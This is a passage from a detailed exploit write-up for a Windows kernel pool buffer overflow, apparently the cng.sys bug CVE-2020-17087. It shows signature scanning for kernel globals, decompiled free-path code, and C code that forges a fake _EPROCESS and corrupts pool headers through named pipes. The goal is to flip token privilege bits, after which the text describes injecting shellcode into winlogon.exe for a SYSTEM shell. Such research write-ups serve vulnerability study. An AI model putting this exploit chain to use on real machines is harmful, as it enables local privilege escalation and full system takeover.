          "\x48\x33\x1D", "\x48\x8D\x04\x49", "\x48\x33\xDF\x48");
    44 0F 44 C9             cmovz   r9d, ecx
    48 3B 3D D3 EF A3 00    cmp     rdi, cs:PsInitialSystemProcess
    41 8D 69 08             lea     ebp, [r9+8]
  PsInitialSystemProcess_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x32 - 0x10,
          "\x48\x3B\x3D", "\x44\x0F\x44\xC9", "\x41\x8D\x69\x08");
    49 8D 5F F0             lea     rbx, [r15-10h]
    48 8B 15 29 F5 A3 00    mov     rdx, cs:ExpPoolQuotaCookie
    45 33 C0                xor     r8d, r8d
    48 8B C2                mov     rax, rdx
  ExpPoolQuotaCookie_ptr = find_address(ExAllocatePoolWithQuotaTag + 0x8C - 0x10,
          "\x48\x8B\x15", "\x49\x8D\x5F\xF0", "\x45\x33\xC0\x48");

  return (RtlpHpHeapGlobals_ptr && PsInitialSystemProcess_ptr && ExpPoolQuotaCookie_ptr);

Additionally we also need to find the _EPROCESS pointer for the self process and winlogon.exe. Since we already obtained nt!PsInitialSystemProcess, it is a well-documented process to obtain the process structures and the Token address.

9. Prepare for arbitrary decrements

When the PoolQuota flag is set in the _POOL_HEADER of a VS chunk, the ProcessBilled is set to an encoded _EPROCESS pointer, which is used to track the allocation and free statistics of the associated chunk. The QuotaBlock is not well-documented and seems being updated across different Windows builds. Reversing of the relevant functions and trial-and-error are required.

0: kd> dt nt!_EPROCESS 0xffffc50d9fc1d030 QuotaBlock
   +0x568 QuotaBlock : 0xffffb203`c294e0a8 _EPROCESS_QUOTA_BLOCK

When a chunk is freed, the QuotaEntry of the relevant PsQuotaTypes is modified. The arbitrary decrement is based the subtraction in nt!PspReturnQuota called from nt!ExFreeHeapPool: we can subtract the chunk size off the QuotaEntry[PsNonPagedPool].Usage. Therefore, by crafting a _EPROCESS structure with the QuotaBlock pointer pointing to a specific offset to certain positions in the Token, we can subtract the chunk size from a QWORD in _TOKEN.Privileges, effectively flipping some bits in the Present and Enabled fields.

__int64 __fastcall ExFreeHeapPool(ULONG_PTR BugCheckParameter2)
  // ...
  if ( ChunkAddr & 0xFFF )                      // not page aligned
    OriginalHeader = ChunkAddr - 16;
    if ( *(_BYTE *)(ChunkAddr - 13) & 4 )       // test PoolType & CacheAligned
      OriginalHeader -= 16i64 * (unsigned __int8)*(_WORD *)OriginalHeader;
      *(_BYTE *)(OriginalHeader + 3) |= 4u;
    _PoolType = *(unsigned __int8 *)(OriginalHeader + 3);
    _Tag = *(_DWORD *)(OriginalHeader + 4);
    if ( _PoolType & 8 )                        // PoolQuota flag: ProcessBilled
      Process = (_BYTE *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8));
      if ( OriginalHeader != (ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) )
        JUMPOUT(Process, 0xFFFF800000000000i64, &BugCheck_C2_466E46);
        JUMPOUT(*Process & 0x7F, 3, &BugCheck_C2_466E46);
        if ( Process != (_BYTE *)PsInitialSystemProcess )
            *(char **)((OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)) + 0x568),
            (_EPROCESS *)(OriginalHeader ^ ExpPoolQuotaCookie ^ *(_QWORD *)(OriginalHeader + 8)),
            _PoolType & 1,
            16i64 * (unsigned __int8)*(_WORD *)(OriginalHeader + 2));
          Tag = *(unsigned int *)(OriginalHeader + 4);
        ObDereferenceObjectDeferDeleteWithTag((ULONG_PTR)Process);// EPROCESS
    // ...

In this exploit, the PsPoolTypes happens to be 0 (PsNonPagedPool), and the Usage field is at offset 0 of each EPROCESS_QUOTA_ENTRY, we just set the QuotaBlock pointer to the location of the LSB to decrement:

// note the fake _EPROCESS starts at offset 0x70 of each buffer
void setup_fake_eprocess(UINT64 token_addr)
  char fake_eproc_buf[0x3000] = { 0 };
  copySelfEprocess(fake_eproc_buf, self_eprocess);
  memcpy(fake_eproc_buf+0x1000, fake_eprocess_buf, FAKE_EPROCESS_SIZE);

#ifdef _WINDLL
  memcpy(fake_eproc_buf+0x2000, fake_eprocess_buf, FAKE_EPROCESS_SIZE);
  *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)=token_addr+0x4B;  // dec1
  *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)=token_addr+0x44;// dec2
  *(UINT64*)(fake_eproc_buf+0x2070+off_QuotaBlock)=token_addr+0x3D;// dec3
  *(UINT64*)(fake_eproc_buf+0x70+off_QuotaBlock)= token_addr+0x40;// 0x40 Present
  *(UINT64*)(fake_eproc_buf+0x1070+off_QuotaBlock)= token_addr+0x48;//0x48 Enabled

  alloc_fake_eprocess(fake_eprocess_buf, target_pipes, aar_index + 2);

The fake _EPROCESS is an exact copy from the self process by utilizing the AAR. Due to different initial values in token, we need different locations for the LPE version and the DLL version. As in the code above.

To successfully free a chunk such that the QuotaBlock decrement is effective, we also need to fix the VS chunk header _HEAP_VS_CHUNK_HEADER by first leaking the VS Subsegment address VSSubSegmentAddr with find_vs_subsegment, then use fix_vs_header as we want to free the target chunk T. The previously leaked nt!RtlpHpHeapGlobals is used to derive the HeapKey for encoding the header. The actual _EPROCESS pointer being updated into ProcessBilled is encoded via encode_ep:

// chunk_addr: address of the _POOL_HEADER
UINT64 encode_ep(UINT64 eproc, UINT64 chunk_addr)
    return eproc ^ ExpPoolQuotaCookie ^ chunk_addr;
10. Perform decrements

We finally invoke the decrement by first invoking the ghost chunk linear pool overflow, to update the crafted ProcessBilled encoded pointer, the correct root queue pointer target_write_queue for the current target chunk T (note that T although in the same address, but actually changes to a new block each time it is reallocated, thus with a different root queue pointer), set the PoolQuota flag for the header, and with a fixed VS chunk header. After the overflow we can free T to invoke the decrement.

For stability, we need to reclaim the chunk T back immediately, also in preparation for the next decrement. This is done with rewrite_pipes and rewrite_pipes2 if a 3rd decrement is needed. Currently we use 0x200 rewrite pipes to reclaim the chunk T for reliability. Each time after the rewrite, we invoke the ghost chunk linear pool overflow again to turn T into a leak primitive to search for the correct chunk among the rewrite pipe DQE objects:

rewrite_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'V', 0);	// for final decrement
rewrite2_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'Z', 0);// to fill rewrite_pipes
rewrite3_pipes = prepare_pipe(0x3D0, NUM_REWRITE_PIPES, 'A', 0);// to fill rewrite2_pipes

Take the 2nd decrement for example, we first over write T so it becomes a leak primitive (marked as aar2), then use it to confirm the previous reclaim works fine then locate the new T chunk. With the handle we we can find its original root queue pointer with find_write_queue using the process handle table. Finally we invoke the linear pool overflow again using the ghost chunk to set the new ProcessBilled and mark it as dec2 so it's ready to be freed to perform the 2nd decrement.

// enable the arb_read() primitive and restore the target chunk to 0x3E0 bytes
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x10) = target_pool_hdr;// _POOL_HEADER
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08) = 0;		// Clear ProcessBilled
*(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) = 0x2;	// Clear Quota bit
fix_vs_header((UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x20), target_page_addr + 0xbe0 - 0x20, 0x3e0);

*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)=leak_root_queue;// QE.Flink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)=leak_root_queue;// QE.Blink
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)=1;	// Unbuffered -> Bufferred
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x32726161;// Buf[]: "aar2"
*(UINT32*)(ghost_pipes->payload+0x00) = 0x324C4747;		// Mark: "GGL2"

create_hole_at(ghost_pipes, ghost_idx);					// free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);					// rewrite ghost chunk
current_pipe_offset = 0;

for (aar_index = 0; aar_index < NUM_REWRITE_PIPES; aar_index ++) {
  BYTE buf[0x10] = { 0 };
  if (!peek_data(rewrite_pipes, aar_index, buf, 8)) exp_failed();
  if ( *(UINT32*)buf != 0x56565656) {	// found overwrite if not 'VVVV'
    aar_pipes = rewrite_pipes;
    _LOG(output, "[+] Rewrite chunk (aar2/dec2) at: index 0x%X, handle 0x%llX\n", aar_index, (UINT64)rewrite_pipes->writePipe[aar_index]);
if (aar_index == NUM_REWRITE_PIPES) {
  _LOG(output, "[+] First rewrite of 0x3E0 bytes chunks failed. \n");

// find the WriteQueue of the reclaimed rewrite chunk after ghost overwrite to fix it
find_write_queue(self_eprocess, rewrite_pipes->writePipe[aar_index]);
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x00)=target_write_queue;// QE.Flink
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x08)=target_write_queue;// QE.Blink
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30-0x08)=encode_ep(fake_eprocess + 0x1000, target_page_addr + 0xbe0 - 0x10);
*(UINT8 *) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3) |= 0x8; // Set Quota bit
*(UINT64 *)(ghost_pipes->payload+0x3F0-0x30+0x10)=0;	// Clear Irp buffer
*(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x20)=0;	// Unbufferred
*(UINT32 *)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x32636564;// Buf[]: "dec2"
*(UINT32 *)(ghost_pipes->payload+0x00)=0x32474747;		// Mark: "GGG2"

create_hole_at(ghost_pipes, ghost_idx);					// free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);					// rewrite ghost chunk

// perform 2nd decrement (-0x3E0) at Token + 0x48: 0x800000 - 0x3e0 = 0x7ffc20
create_hole_at(rewrite_pipes, aar_index);

Note the DQE object has to be changed to Unbuffered mode before it is freed.

11. Spawn SYSTEM shell

Once we've obtained SeDebugPrivilege, we can then inject shellcode into winlogon.exe to spawn a SYSTEM shell.



  1. Mateusz Jurczyk (@j00ru) and Sergei Glazunov, Issue 2104: Windows Kernel cng.sys pool-based buffer overflow in IOCTL 0x390400

  2. Mateusz Jurczyk (@j00ru), CVE-2020-17087: Windows pool buffer overflow in cng.sys IOCTL

  3. Corentin Bayet (@OnlyTheDuck) and Paul Fariello (@paulfariello), SSTIC2020: Scoop the Windows 10 pool!

  4. Angelboy (@scwuaptx), Hitcon'20 CTF: Lucifer Challenge writeup

  5. Angelboy (@scwuaptx), Hitcon'20 CTF: MichaelStorage challenge writeup

  6. Angelboy (@scwuaptx), Windows Kernel Heap: Part 1: Segment Heap in Windows Kernel

  7. Mark Vincent Yason (@MarkYason), Windows 10 Segment Heap Internals, BlackHat USA 2016.